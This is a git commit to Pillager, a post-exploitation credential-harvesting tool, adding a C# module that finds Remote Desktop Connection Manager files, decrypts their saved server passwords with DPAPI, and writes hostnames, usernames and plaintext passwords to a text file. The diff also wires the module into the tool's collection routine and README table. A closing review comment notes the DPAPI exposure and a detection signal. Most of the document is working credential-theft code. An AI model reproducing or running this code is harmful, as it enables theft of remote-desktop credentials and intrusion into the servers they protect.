Add RDCMan password recovery

Adminxe 2023-11-13 00:40:17 +08:00
parent 689fadc63e
commit 44a9b70b71
4 changed files with 117 additions and 0 deletions


@ -77,6 +77,7 @@
<Compile Include="Helper\SQLiteHandler.cs" />
<Compile Include="Tools\MobaXterm.cs" />
<Compile Include="Tools\Navicat.cs" />
<Compile Include="Tools\RDCMan.cs" />
<Compile Include="Tools\Xmanager.cs" />
</ItemGroup>
<ItemGroup>


@ -30,6 +30,7 @@ namespace Pillager
MobaXterm.Save(savepath);
Xmanager.Save(savepath);
Navicat.Save(savepath);
RDCMan.Save(savepath);
//Messengers
QQ.Save(savepath);

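--- a/Pillager/Tools/RDCMan.cs
+++ b/Pillager/Tools/RDCMan.cs
@@ -0,0 +1,114 @@
+using Microsoft.Win32;
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Security.Cryptography;
+using System.Text;
+using System.Xml;
+namespace Pillager.Tools
+{
+internal class RDCMan
+{
+public static string ToolName = "RDCMan";
+public static string DecryptPwd()
+{
+StringBuilder sb = new StringBuilder();
+var RDGFiles = new List<string>();
+var RDCManSettings = new XmlDocument();
+string rdgPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Microsoft\Remote Desktop Connection Manager\RDCMan.settings";
+RDCManSettings.LoadXml(File.ReadAllText(rdgPath));
+var nodes = RDCManSettings.SelectNodes("//FilesToOpen");
+foreach (XmlNode node in nodes)
+{
+var RDGFilePath = node.InnerText;
+if (!RDGFiles.Contains(RDGFilePath))
+{
+RDGFiles.Add(RDGFilePath);
+}
+}
+foreach (string RDGFile in RDGFiles)
+{
+sb.AppendLine(ParseRDGFile(RDGFile));
+}
+return sb.ToString();
+}
+private static string DecryptPassword(string password)
+{
+byte[] passwordBytes = Convert.FromBase64String(password);
+password = Encoding.UTF8.GetString(ProtectedData.Unprotect(passwordBytes, null, DataProtectionScope.CurrentUser)).Replace("\0", "");
+return password;
+}
+private static string ParseRDGFile(string RDGPath)
+{
+StringBuilder stringBuilder = new StringBuilder();
+try
+{
+XmlDocument RDGFileConfig = new XmlDocument();
+RDGFileConfig.LoadXml(File.ReadAllText(RDGPath));
+XmlNodeList nodes = RDGFileConfig.SelectNodes("//server");
+foreach (XmlNode node in nodes)
+{
+string hostname = string.Empty, profilename = string.Empty, username = string.Empty, password = string.Empty, domain = string.Empty;
+foreach (XmlNode subnode in node)
+{
+foreach (XmlNode subnode_1 in subnode)
+{
+switch (subnode_1.Name)
+{
+case "name":
+hostname = subnode_1.InnerText;
+break;
+case "profileName":
+profilename = subnode_1.InnerText;
+break;
+case "userName":
+username = subnode_1.InnerText;
+break;
+case "password":
+password = subnode_1.InnerText;
+break;
+case "domain":
+domain = subnode_1.InnerText;
+break;
+}
+}
+}
+if (!string.IsNullOrEmpty(password))
+{
+var decrypted = DecryptPassword(password);
+if (!string.IsNullOrEmpty(decrypted))
+{
+stringBuilder.AppendLine("hostname: " + hostname);
+stringBuilder.AppendLine("profilename: " + profilename);
+stringBuilder.AppendLine("username: " + $"{domain}\\{username}");
+stringBuilder.AppendLine("decrypted: " + decrypted);
+stringBuilder.AppendLine();
+}
+}
+}
+}
+catch { }
+return stringBuilder.ToString();
+}
+public static void Save(string path)
+{
+try
+{
+string rdgPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Microsoft\Remote Desktop Connection Manager\RDCMan.settings";
+if (!File.Exists(rdgPath)) return;
+string savepath = Path.Combine(path, ToolName);
+Directory.CreateDirectory(savepath);
+string output = DecryptPwd();
+if (!string.IsNullOrEmpty(output)) File.WriteAllText(Path.Combine(savepath, ToolName + ".txt"), output);
+}
+catch { }
+}
+}
+}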
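Review bot: The new `RDCMan` class carries no comment saying which artefacts it reads and what it writes, which is the first thing anyone assessing this file needs to know. A class summary would cover it: `/// Reads RDCMan.settings under %LOCALAPPDATA%, loads each file path listed in a FilesToOpen node, and unprotects every stored server password with DPAPI (CurrentUser scope, no additional entropy).` `DecryptPassword` passes `null` entropy with `DataProtectionScope.CurrentUser`, so these blobs are readable by any code running as the same user. Passwords saved in RDCMan should therefore be treated as exposed once that session is compromised, and a process other than RDCMan reading the settings file and the referenced files is the behaviour to alert on. `Save` also writes the recovered values in clear text to `RDCMan.txt` under the output path, which deserves a comment marking that file as sensitive.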


@ -53,6 +53,7 @@ Pillager是一个适用于后渗透期间的信息收集工具可以收集目
| MobaXterm | Password/Credential |
| Xmanager | Password |
| Navicat | Password |
| RDCMan | Password |
| Others | Support |
| :----: | :------: |